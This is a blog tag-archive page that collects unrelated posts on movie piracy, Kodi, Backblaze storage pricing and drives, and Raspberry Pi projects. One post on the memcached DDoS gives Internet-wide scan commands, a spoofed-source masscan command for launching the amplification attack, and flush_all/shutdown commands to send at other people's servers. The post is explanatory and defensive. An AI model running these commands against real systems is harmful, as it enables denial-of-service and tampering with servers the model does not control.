Tag Archives: ATS

Camcording Piracy is Dropping, But Not In Russia

Post Syndicated from Ernesto original https://torrentfreak.com/camcording-piracy-is-dropping-but-not-in-russia-180311/

The movie industry sees movies that are illegally recorded in theaters as one of the biggest piracy threats worldwide.

To combat this, audio and video watermarking tools are used to detect pirates and their favorite locations. In addition, night-vision goggles and other spy tech are employed to monitor moviegoers during high profile film premieres.

Despite these efforts, so-called ‘cam’ releases of hundreds of films still end up on pirate sites.

In fact, the majority of all new pirated movies that appear online can be traced to a digital recording in a movie theater. This can be the movie itself, the audio, or both. The good news for the movie industry is that the total number seems to be dropping somewhat.

According to statistics gathered by the MPAA, 447 illegal recording of its members’ movies were detected in 2017. This is down 11% compared to the year before when 503 titles were recorded. This suggests that enforcement actions and preventive measures are paying off. However, this is not visible everywhere.

This week Kevin Rosenbaum of the International Intellectual Property Alliance (IIPA), which represents various industry groups including the MPAA, informed the US International Trade Commission that camcording piracy is on the rise in Russia.

In his oral testimony, Rosenbaum signaled three key copyright issues in Russia that deserve attention from the US Government.

“First is to dramatically improve enforcement against online piracy, particularly piracy sites and services directed to users outside of Russia,” Rosenbaum said.

In addition, the country also has to address the problem with the Russian collecting societies, to effectively handle music licensing. These currently lack transparency or good governance, IIPA noted.

The third issue that needs attention is camcording piracy. According to IIPA’s statement, there has been a dramatic increase in illegally recorded movies over the past several years.

“Russia must address the problem of camcording motion pictures, which has risen dramatically over the past three years (200% since 2015) and fuels online piracy,” Rosenbaum noted.

In 2015 the movie industry traced 26 camcorded copies to Russia and by last year this number had increased to 78. These releases are linked to movie theaters around the country, from Moscow, Kazan, Tatarstan, St. Petersburg, all the way up to Siberia.

The Russian camcording piracy problem was also highlighted in IIPA’s recent Special 301 submission to the US Trade Representative.

“Russia remains the home to some of the world’s most prolific criminal release groups of motion pictures.” IIPA wrote last month. “The illicit camcords that are sourced from Russia are only of fair quality, but they remain in high demand by international criminal syndicates.”

With help from the Russian-Anti Piracy Organization over a dozen cammers were caught last year. In addition, four criminal cases were launched.

IIPA hopes that these will result in convictions, to create a deterrent effect. In addition, the group highlights that Russia could strengthen its laws, perhaps with a little push from the US.

A copy of Kevin Rosenbaum’s statement before the United States International Trade Commission is available here (pdf). In addition to Russia, it also highlights issues in other countries.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

McAfee Security Experts Weigh-in Weirdly With “Fresh Kodi Warning”

Post Syndicated from Andy original https://torrentfreak.com/mcafee-security-experts-weigh-in-weirdly-with-fresh-kodi-warning-180311/

Over the past several years, the last couple in particular, piracy has stormed millions of homes around the world.

From being a widespread but still fairly geeky occupation among torrenters, movie and TV show piracy can now be achieved by anyone with the ability to click a mouse or push a button on a remote control. Much of this mainstream interest can be placed at the feet of the Kodi media player.

An entirely legal platform in its own right, Kodi can be augmented with third-party add-ons that enable users to access an endless supply of streaming media. As such, piracy-configured Kodi installations are operated by an estimated 26 million people, according to the MPAA.

This popularity has led to much interest from tabloid newspapers in the UK which, for reasons best known to them, choose to both promote and demonize Kodi almost every week. While writing about news events is clearly par for the course, when one considers some of the reports, their content, and what inspired them, something doesn’t seem right.

This week The Express, which has published many overly sensational stories about Kodi in recent times, published another. The title – as always – promised something special.

Sounds like big news….

Reading the text, however, reveals nothing new whatsoever. The piece simply rehashes some of the historic claims that have been leveled at Kodi that can easily apply to any Internet-enabled software or system. But beyond that, some of its content is pretty weird.

The piece is centered on comments from two McAfee security experts – Chief Scientist Raj Samani and Chief Consumer Security Evangelist Gary Davis. It’s unclear whether The Express approached them for comment (if they did, there is no actual story for McAfee to comment on) or whether McAfee offered the comments and The Express built a story around them. Either way, here’s a taster.

“Kodi has been pretty open about the fact that it’s a streaming site but my view has always been if I use Netflix I know that I’m not going to get any issues, if I use Amazon I’m not going to get any issues,” Samani told the publication.

Ok, stop right there. Kodi admits that it’s a streaming site? Really? Kodi is a piece of software. It’s a media player. It can do many things but Kodi is not a streaming site and no one at Kodi has ever labeled it otherwise. To think that neither McAfee nor the publication caught that one is a bit embarrassing.

The argument that Samani was trying to make is that services like Netflix and Amazon are generally more reliable than third-party sources and there are few people out there who would argue with that.

“Look, ultimately you’ve got to do the research and you’ve got to decide if it’s right for you but personally I don’t use [Kodi] and I know full well that by not using [Kodi] I’m not going to get any issues. If I pay for the service I know exactly what I’m going to get,” he said.

But unlike his colleague who doesn’t use Kodi, Gary Davis has more experience.

McAfee’s Chief Consumer Security Evangelist admits to having used Kodi in the past but more recently decided not to use it when the security issues apparently got too much for him.

“I did use [Kodi] but turned it off as I started getting worried about some of the risks,” he told The Express.

“You may search for something and you may get what you are looking for but you may get something that you are not looking for and that’s where the problem lies with Kodi.”

This idea, that people search for a movie or TV show yet get something else, is bewildering to most experienced Kodi users. If this was indeed the case, on any large scale, people wouldn’t want to use it anymore. That’s clearly not the case.

Also, incorrect content appearing is not the kind of security threat that the likes of McAfee tend to be worried about. However, Davis suggests things can get worse.

“I’m not saying they’ve done anything wrong but if somebody is able to embed code to turn on a microphone or other things or start sending data to a place it shouldn’t go,” he said.

The sentence appears to have some words missing and struggles to make sense but the suggestion is that someone’s Kodi installation could be corrupted to the point that someone people could hijack the user’s microphone.

We are not aware of anything like that happening, ever, via Kodi. There are instances where that has happened completely without it in a completely different context, but that seems here nor there. By the same count, everyone should stop using Windows perhaps?

The big question is why these ‘scary’ Kodi non-stories keep getting published and why experts are prepared to weigh-in on them?

It would be too easy to quickly put it down to some anti-piracy agenda, even though there are plenty of signs that anti-piracy groups have been habitually feeding UK tabloids with information on that front. Indeed, a source at a UK news outlet (that no longer publishes such stories) told TF that they were often prompted to write stories about Kodi and streaming in general, none with a positive spin.

But if it was as simple as that, how does that explain another story run in The Express this week heralding the launch of Kodi’s ‘Leia’ alpha release?

If Kodi is so bad as to warrant an article telling people to avoid it FOREVER on one day, why is it good enough to be promoted on another? It can only come down to the number of clicks – but the clickbait headline should’ve given that away at the start.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Backblaze Cuts B2 Download Price In Half

Post Syndicated from Ahin Thomas original https://www.backblaze.com/blog/backblaze-b2-drops-download-price-in-half/

Backblaze B2 downloads now cost 50% less
Backblaze is pleased to announce that, effective immediately, we are reducing the price of Backblaze B2 Cloud Storage downloads by 50%. This means that B2 download pricing drops from $0.02 to $0.01 per GB. As always, the first gigabyte of data downloaded each day remains free.

If some of this sounds familiar, that’s because a little under a year ago, we dropped our download price from $0.05 to $0.02. While that move solidified our position as the affordability leader in the high performance cloud storage space, we continue to innovate on our platform and are excited to provide this additional value to our customers.

This price reduction applies immediately to all existing and new customers. In keeping with Backblaze’s overall approach to providing services, there are no tiers or minimums. It’s automatic and it starts today.

Why Is Backblaze Lowering What Is Already The Industry’s Lowest Price?

Because it makes cloud storage more useful for more people.

When we decided to use Backblaze B2 as our cloud storage service, their download pricing at the time enabled us to offer our broadcasters unlimited audio uploads so they can upload past decades of preaching to our extensive library for streaming and downloading. With Backblaze cutting the bandwidth prices 50% to just one penny a gigabyte, we are excited about offering much higher quality video. — Ian Wagner, Senior Developer, Sermon Audio

Since our founding in 2007, Backblaze’s mission has been to make storing data astonishingly easy and affordable. We have a well documented, relentless pursuit of lowering storage costs — it starts with our storage pods and runs through everything we do. Today, we have over 500 petabytes of customer data stored. B2’s storage pricing already being 14 that of Amazon’s S3 has certainly helped us get there. Today’s pricing reduction puts our download pricing 15 that of S3. The “affordable” part of our story is well established.

I’d like to take a moment to discuss the “easy” part. Our industry has historically done a poor job of putting ourselves in our customers’ shoes. When customers are faced with the decision of where to put their data, price is certainly a factor. But it’s not just the price of storage that customers must consider. There’s a cost to download your data. The business need for providers to charge for this is reasonable — downloading data requires bandwidth, and bandwidth costs money. We discussed that in a prior post on the Cost of Cloud Storage.

But there’s a difference between the costs of bandwidth and what the industry is charging today. There’s a joke that some of the storage clouds are competing to become “Hotel California” — you can check out anytime you want, but your data can never leave.1 Services that make it expensive to restore data or place time lag impediments to data access are reducing the usefulness of your data. Customers should not have to wonder if they can afford to access their own data.

When replacing LTO with StarWind VTL and cloud storage, our customers had only one concern left: the possible cost of data retrieval. Backblaze just wiped this concern out of the way by lowering that cost to just one penny per gig. — Max Kolomyeytsev, Director of Product Management, StarWind

Many businesses have not yet been able to back up their data to the cloud because of the costs. Many of those companies are forced to continue backing up to tape. That tape is an inefficient means for data storage is clear. Solution providers like StarWind VTL specialize in helping businesses move off of antiquated tape libraries. However, as Max Kolomyeytsev, Director of Product Management at StarWind points out, “When replacing LTO with StarWind VTL and cloud storage our customers had only one concern left: the possible cost of data retrieval. Backblaze just wiped this concern out of the way by lowering that cost to just one penny per gig.”

Customers that have already adopted the cloud often are forced to make difficult tradeoffs between data they want to access and the cost associated with that access. Surrendering the use of your own data defeats many of the benefits that “the cloud” brings in the first place. Because of B2’s download price, Ian Wagner, a Senior Developer at Sermon Audio, is able to lower his costs and expand his product offering. “When we decided to use Backblaze B2 as our cloud storage service, their download pricing at the time enabled us to offer our broadcasters unlimited audio uploads so they can upload past decades of preaching to our extensive library for streaming and downloading. With Backblaze cutting the bandwidth prices 50% to just one penny a gigabyte, we are excited about offering much higher quality video.”

Better Download Pricing Also Helps Third Party Applications Deliver Customer Solutions

Many organizations use third party applications or devices to help manage their workflows. Those applications are the hub for customers getting their data to where it needs to go. Leaders in verticals like Media Asset Management, Server & NAS Backup, and Enterprise Storage have already chosen to integrate with B2.

With Backblaze lowering their download price to an amazing one penny a gigabyte, our CloudNAS is even a better fit for photographers, videographers and business owners who need to have their files at their fingertips, with an easy, reliable, low cost way to use Backblaze for unlimited primary storage and active archive. — Paul Tian, CEO, Morro Data

For Paul Tian, founder of Ready NAS and CEO of Morro Data, reasonable download pricing also helps his company better serve its customers. “With Backblaze lowering their download price to an amazing one penny a gigabyte, our CloudNAS is even a better fit for photographers, videographers and business owners who need to have their files at their fingertips, with an easy, reliable, low cost way to use Backblaze for unlimited primary storage and active archive.”

If you use an application that hasn’t yet integrated with B2, please ask your provider to add B2 Cloud Storage and mention the application in the comments below.


How Do the Major Cloud Storage Providers Compare on Pricing?

Not only is Backblaze B2 storage 14 the price of Amazon S3, Google Cloud, or Azure, but our download pricing is now 15 their price as well.

Pricing Tier Backblaze B2 Amazon S3 Microsoft Azure Google Cloud
First 1 TB $0.01 $0.09 $0.09 $0.12
Next 9 TB $0.01 $0.09 $0.09 $0.11
Next 40 TB $0.01 $0.085 $0.09 $0.08
Next 100 TB $0.01 $0.07 $0.07 $0.08
Next 350 TB+ $0.01 $0.05 $0.05 $0.08

Using the chart above, let’s compute a few examples of download costs…

Data Backblaze B2 Amazon S3 Microsoft Azure Google Cloud
1 terabyte $10 $90 $90 $120
10 terabytes $100 $900 $900 $1,200
50 terabytes $500 $4,300 $4,500 $4,310
500 terabytes $5,000 $28,800 $29,000 $40,310
Not only is Backblaze B2 pricing dramatically lower cost, it’s also simple — one price for any amount of data downloaded to anywhere. In comparison, to compute the cost of downloading 500 TB of data with S3 you start with the following formula:
(($0.09 * 10) + ($0.085 * 40) + ($0.07 * 100) + ($0.05 * 350)) * 1,000
Want to see this comparison for the amount of data you manage?
Use our cloud storage calculator.

Customers Want to Avoid Vendor Lock In

Halving the price of downloads is a crazy move — the kind of crazy our customers will be excited about. When using our Transmit 5 app on the Mac to upload their data to B2 Cloud Storage, our users can sleep soundly knowing they’ll be getting a truly affordable price when they need to restore that data. Cool beans, Backblaze. — Cabel Sasser, Co-Founder, Panic

As the cloud storage industry grows, customers are increasingly concerned with getting locked in to one vendor. No business wants to be fully dependent on one vendor for anything. In addition, customers want multiple copies of their data to mitigate against a vendor outage or other issues.

Many vendors offer the ability for customers to replicate data across “regions.” This enables customers to store data in two physical locations of the customer’s choosing. Of course, customers pay for storing both copies of the data and for the data transfer between regions.

At 1¢ per GB, transferring data out of Backblaze is more affordable than transferring data between most other vendor regions. For example, if a customer is storing data in Amazon S3’s Northern California region (US West) and wants to replicate data to S3 in Northern Virginia (US East), she will pay 2¢ per GB to simply move the data.

However, if that same customer wanted to replicate data from Backblaze B2 to S3 in Northern Virginia, she would pay 1¢ per GB to move the data. She can achieve her replication strategy while also mitigating against vendor risk — all while cutting the bandwidth bill by 50%. Of course, this is also before factoring the savings on her storage bill as B2 storage is 14 of the price of S3.

How Is Backblaze Doing This?

Simple. We just changed our pricing table and updated our website.

The longer answer is that the cost of bandwidth is a function of a few factors, including how it’s being used and the volume of usage. With another year of data for B2, over a decade of experience in the cloud storage industry, and data growth exceeding 100 PB per quarter, we know we can sustainably offer this pricing to our customers; we also know how better download pricing can make our customers and partners more effective in their work. So it is an easy call to make.

Our pricing is simple. Storage is $0.005/GB/Month, Download costs are $0.01/GB. There are no tiers or minimums and you can get started any time you wish.

Our desire is to provide a great service at a fair price. We’re proud to be the affordability leader in the Cloud Storage space and hope you’ll give us the opportunity to show you what B2 Cloud Storage can enable for you.

Enjoy the service and I’d love to hear what this price reduction does for you in the comments below…or, if you are attending NAB this year, come by to visit and tell us in person!

1 For those readers who don’t get the Eagles reference there, please click here…I promise you won’t regret the next 7 minutes of your life.

The post Backblaze Cuts B2 Download Price In Half appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Welcome New Support Tech – Matt!

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-new-support-tech-matt/

Our hiring spree keeps rolling and we have a new addition to the support team, Matt! He joins the team as a Junior Technical Support Rep, and will be helping answer folks’ questions, guiding them through the product, and making sure that everyone’s taken care of! Lets learn a bit more about Matt shall we?

What is your Backblaze Title?
Junior Technical Support Representative

Where are you originally from?
San Francisco Bay Area

What attracted you to Backblaze?
Everyone is super chill and I like how transparent everyone is. The culture is very casual and not overbearing.

What do you expect to learn while being at Backblaze?
What the tech industry is like.

Where else have you worked?
The Chairman! Best bao ever.

Where did you go to school?
College of San Mateo.

What’s your dream job?
Being a chef has always interested me. It’s so interesting that we’ve turned food into an art.

Favorite place you’ve traveled?
Japan. Holy crap Japan is cool. Everyone is so polite and the place is so clean. You haven’t had ramen like they serve, I literally couldn’t stop smiling after my first bite. The moment we arrived, I said, “I already miss Japan.”

Favorite hobby?
As much as I like video games, cooking is my favorite. Everyone eats, and it’s a good feeling to make food that people like. Currently trying to figure out how to make brussel sprouts taste better than brussel sprouts.

Of what achievement are you most proud?
Meeting my girlfriend. My life turned around when I met her. She’s taught me a lot of things.

Star Trek or Star Wars?
Star Wars!

Coke or Pepsi?
Good ol’ Cola. I quit drinking soda, though.

Favorite food?
As much as I love eating healthy, there’s nothing like spam.

Why do you like certain things?
Because certain things are either fun or delicious.

Anything else you’d like you’d like to tell us?
If you have any good recipes, I’ll probably cook it. Or try to.

You’re right Matt, certain things are either fun or delicious, like The Chairman’s bao! Welcome aboard!

The post Welcome New Support Tech – Matt! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Coding is for girls

Post Syndicated from magda original https://www.raspberrypi.org/blog/coding-is-for-girls/

Less than four years ago, Magda Jadach was convinced that programming wasn’t for girls. On International Women’s Day, she tells us how she discovered that it definitely is, and how she embarked on the new career that has brought her to Raspberry Pi as a software developer.

“Coding is for boys”, “in order to be a developer you have to be some kind of super-human”, and “it’s too late to learn how to code” – none of these three things is true, and I am going to prove that to you in this post. By doing this I hope to help some people to get involved in the tech industry and digital making. Programming is for anyone who loves to create and loves to improve themselves.

In the summer of 2014, I started the journey towards learning how to code. I attended my first coding workshop at the recommendation of my boyfriend, who had constantly told me about the skill and how great it was to learn. I was convinced that, at 28 years old, I was already too old to learn. I didn’t have a technical background, I was under the impression that “coding is for boys”, and I lacked the superpowers I was sure I needed. I decided to go to the workshop only to prove him wrong.

Later on, I realised that coding is a skill like any other. You can compare it to learning any language: there’s grammar, vocabulary, and other rules to acquire.

Log In or Sign Up to View

See posts, photos and more on Facebook.

Alien message in console

To my surprise, the workshop was completely inspiring. Within six hours I was able to create my first web page. It was a really simple page with a few cats, some colours, and ‘Hello world’ text. This was a few years ago, but I still remember when I first clicked “view source” to inspect the page. It looked like some strange alien message, as if I’d somehow broken the computer.

I wanted to learn more, but with so many options, I found myself a little overwhelmed. I’d never taught myself any technical skill before, and there was a lot of confusing jargon and new terms to get used to. What was HTML? CSS and JavaScript? What were databases, and how could I connect together all the dots and choose what I wanted to learn? Luckily I had support and was able to keep going.

At times, I felt very isolated. Was I the only girl learning to code? I wasn’t aware of many female role models until I started going to more workshops. I met a lot of great female developers, and thanks to their support and help, I kept coding.

Another struggle I faced was the language barrier. I am not a native speaker of English, and diving into English technical documentation wasn’t easy. The learning curve is daunting in the beginning, but it’s completely normal to feel uncomfortable and to think that you’re really bad at coding. Don’t let this bring you down. Everyone thinks this from time to time.

Play with Raspberry Pi and quit your job

I kept on improving my skills, and my interest in developing grew. However, I had no idea that I could do this for a living; I simply enjoyed coding. Since I had a day job as a journalist, I was learning in the evenings and during the weekends.

I spent long hours playing with a Raspberry Pi and setting up so many different projects to help me understand how the internet and computers work, and get to grips with the basics of electronics. I built my first ever robot buggy, retro game console, and light switch. For the first time in my life, I had a soldering iron in my hand. Day after day I become more obsessed with digital making.

Magdalena Jadach on Twitter

solderingiron Where have you been all my life? Weekend with #raspberrypi + @pimoroni + @Pololu + #solder = best time! #electricity

One day I realised that I couldn’t wait to finish my job and go home to finish some project that I was working on at the time. It was then that I decided to hand over my resignation letter and dive deep into coding.

For the next few months I completely devoted my time to learning new skills and preparing myself for my new career path.

I went for an interview and got my first ever coding internship. Two years, hundreds of lines of code, and thousands of hours spent in front of my computer later, I have landed my dream job at the Raspberry Pi Foundation as a software developer, which proves that dreams come true.

Animated GIF – Find & Share on GIPHY

Discover & share this Animated GIF with everyone you know. GIPHY is how you search, share, discover, and create GIFs.

Where to start?

I recommend starting with HTML & CSS – the same path that I chose. It is a relatively straightforward introduction to web development. You can follow my advice or choose a different approach. There is no “right” or “best” way to learn.

Below is a collection of free coding resources, both from Raspberry Pi and from elsewhere, that I think are useful for beginners to know about. There are other tools that you are going to want in your developer toolbox aside from HTML.

  • HTML and CSS are languages for describing, structuring, and styling web pages
  • You can learn JavaScript here and here
  • Raspberry Pi (obviously!) and our online learning projects
  • Scratch is a graphical programming language that lets you drag and combine code blocks to make a range of programs. It’s a good starting point
  • Git is version control software that helps you to work on your own projects and collaborate with other developers
  • Once you’ve got started, you will need a code editor. Sublime Text or Atom are great options for starting out

Coding gives you so much new inspiration, you learn new stuff constantly, and you meet so many amazing people who are willing to help you develop your skills. You can volunteer to help at a Code Club or  Coder Dojo to increase your exposure to code, or attend a Raspberry Jam to meet other like-minded makers and start your own journey towards becoming a developer.

The post Coding is for girls appeared first on Raspberry Pi.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

Voice-controlled magnification glasses

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/voice-controlled-magnification-glasses/

Go hands-free in the laboratory or makerspace with Mauro Pichiliani’s voice-controlled magnification glasses.

Voice Controlled Glasses With Magnifying Lens

This video presents the project MoveLens: a voice controlled glasses with magnifying lens. It was the my entry for the Voice Activated context on unstructables. Check the step by step guide at Voice Controlled Glasses With Magnifying Lens. Source code: https://github.com/pichiliani/MoveLens Step by Step guide: https://www.instructables.com/id/Voice-Controlled-Glasses-With-Magnifying-Lens/

It’s a kind of magnification

We’ve all been there – that moment when you need another pair of hands to complete a task. And while these glasses may not hold all the answers, they’re a perfect addition to any hobbyist’s arsenal.

Introducing Mauro Pichilliani’s voice-activated glasses: a pair of frames with magnification lenses that can flip up and down in response to a voice command, depending on the task at hand. No more needing to put down your tools in order to put magnifying glasses on. No more trying to re-position a magnifying glass with the back of your left wrist, or getting grease all over your lenses.

As Mauro explains in his tutorial for the glasses:

Many professionals work for many hours looking at very small areas, such as surgeons, watchmakers, jewellery designers and so on. Most of the time these professionals use some kind of magnification glasses that helps them to see better the area they are working with and other tiny items used on the job. The devices that had magnifications lens on a form factor of a glass usually allow the professional to move the lens out of their eye sight, i.e. put aside the lens. However, in some scenarios touching the lens or the glass rim to move away the lens can contaminate the fingers. Also, it is cumbersome and can break the concentration of the professional.

Voice-controlled magnification glasses

Using a Raspberry Pi Zero W, a servo motor, a microphone, and the IBM Watson speech-to-text service, Mauro built a pair of glasses that lets users control the position of the magnification lenses with voice commands.

Magnification glasses, before modification and addition of Raspberry Pi

The glasses Mauro modified, before he started work on them; you have to move the lenses with your hands, like it’s October 2015

Mauro started by dismantling a pair of standard magnification glasses in order to modify the lens supports to allow them to move freely. He drilled a hole in one of the lens supports to provide a place to attach the servo, and used lollipop sticks and hot glue to fix the lenses relative to one another, so they would both move together under the control of the servo. Then, he set up a Raspberry Pi Zero, installing Raspbian and software to use a USB microphone; after connecting the servo to the Pi Zero’s GPIO pins, he set up the Watson speech-to-text service.

Finally, he wrote the code to bring the project together. Two Python scripts direct the servo to raise and lower the lenses, and a Node.js script captures audio from the microphone, passes it on to Watson, checks for an “up” or “down” command, and calls the appropriate Python script as required.

Your turn

You can follow the tutorial on the Instructables website, where Mauro entered the glasses into the Instructables Voice Activated Challenge. And if you’d like to take your first steps into digital making using the Raspberry Pi, take a look at our free online projects.

The post Voice-controlled magnification glasses appeared first on Raspberry Pi.

HDD vs SSD: What Does the Future for Storage Hold?

Post Syndicated from Roderick Bauer original https://www.backblaze.com/blog/ssd-vs-hdd-future-of-storage/

SSD 60 TB drive

This is part one of a series. Use the Join button above to receive notification of future posts on this and other topics.

Customers frequently ask us whether and when we plan to move our cloud backup and data storage to SSDs (Solid-State Drives). That’s not a surprising question considering the many advantages SSDs have over magnetic platter type drives, also known as HDDs (Hard-Disk Drives).

We’re a large user of HDDs in our data centers (currently 100,000 hard drives holding over 500 petabytes of data). We want to provide the best performance, reliability, and economy for our cloud backup and cloud storage services, so we continually evaluate which drives to use for operations and in our data centers. While we use SSDs for some applications, which we’ll describe below, there are reasons why HDDs will continue to be the primary drives of choice for us and other cloud providers for the foreseeable future.

HDDs vs SSDs


The laptop computer I am writing this on has a single 512GB SSD, which has become a common feature in higher end laptops. The SSD’s advantages for a laptop are easy to understand: they are smaller than an HDD, faster, quieter, last longer, and are not susceptible to vibration and magnetic fields. They also have much lower latency and access times.

Today’s typical online price for a 2.5” 512GB SSD is $140 to $170. The typical online price for a 3.5” 512 GB HDD is $44 to $65. That’s a pretty significant difference in price, but since the SSD helps make the laptop lighter, enables it to be more resistant to the inevitable shocks and jolts it will experience in daily use, and adds of benefits of faster booting, faster waking from sleep, and faster launching of applications and handling of big files, the extra cost for the SSD in this case is worth it.

Some of these SSD advantages, chiefly speed, also will apply to a desktop computer, so desktops are increasingly outfitted with SSDs, particularly to hold the operating system, applications, and data that is accessed frequently. Replacing a boot drive with an SSD has become a popular upgrade option to breathe new life into a computer, especially one that seems to take forever to boot or is used for notoriously slow-loading applications such as Photoshop.

We covered upgrading your computer with an SSD in our blog post SSD 101: How to Upgrade Your Computer With An SSD.

Data centers are an entirely different kettle of fish. The primary concerns for data center storage are reliability, storage density, and cost. While SSDs are strong in the first two areas, it’s the third where they are not yet competitive. At Backblaze we adopt higher density HDDs as they become available — we’re currently using both 10TB and 12TB drives (among other capacities) in our data centers. Higher density drives provide greater storage density per Storage Pod and Vault and reduce our overhead cost through less required maintenance and lower total power requirements. Comparable SSDs in those sizes would cost roughly $1,000 per terabyte, considerably higher than the corresponding HDD. Simply put, SSDs are not yet in the price range to make their use economical for the benefits they provide, which is the reason why we expect to be using HDDs as our primary storage media for the foreseeable future.

What Are HDDs?

HDDs have been around over 60 years since IBM introduced them in 1956. The first disk drive was the size of a car, stored a mere 3.75 megabytes, and cost $300,000 in today’s dollars.

IBM 350 Disk Storage System — 3.75MB in 1956

The 350 Disk Storage System was a major component of the IBM 305 RAMAC (Random Access Method of Accounting and Control) system, which was introduced in September 1956. It consisted of 40 platters and a dual read/write head on a single arm that moved up and down the stack of magnetic disk platters.

The basic mechanism of an HDD remains unchanged since then, though it has undergone continual refinement. An HDD uses magnetism to store data on a rotating platter. A read/write head is affixed to an arm that floats above the spinning platter reading and writing data. The faster the platter spins, the faster an HDD can perform. Typical laptop drives today spin at either 5400 RPM (revolutions per minute) or 7200 RPM, though some server-based platters spin at even higher speeds.

Exploded drawing of a hard drive

Exploded drawing of a hard drive

The platters inside the drives are coated with a magnetically sensitive film consisting of tiny magnetic grains. Data is recorded when a magnetic write-head flies just above the spinning disk; the write head rapidly flips the magnetization of one magnetic region of grains so that its magnetic pole points up or down, to encode a 1 or a 0 in binary code. If all this sounds like an HDD is vulnerable to shocks and vibration, you’d be right. They also are vulnerable to magnets, which is one way to destroy the data on an HDD if you’re getting rid of it.

The major advantage of an HDD is that it can store lots of data cheaply. One and two terabyte (1,024 and 2,048 gigabytes) hard drives are not unusual for a laptop these days, and 10TB and 12TB drives are now available for desktops and servers. Densities and rotation speeds continue to grow. However, if you compare the cost of common HDDs vs SSDs for sale online, the SSDs are roughly 3-5x the cost per gigabyte. So if you want cheap storage and lots of it, using a standard hard drive is definitely the more economical way to go.

What are the best uses for HDDs?

  • Disk arrays (NAS, RAID, etc.) where high capacity is needed
  • Desktops when low cost is priority
  • Media storage (photos, videos, audio not currently being worked on)
  • Drives with extreme number of reads and writes

What Are SSDs?

SSDs go back almost as far as HDDs, with the first semiconductor storage device compatible with a hard drive interface introduced in 1978, the StorageTek 4305.

Storage Technology 4305 SSD

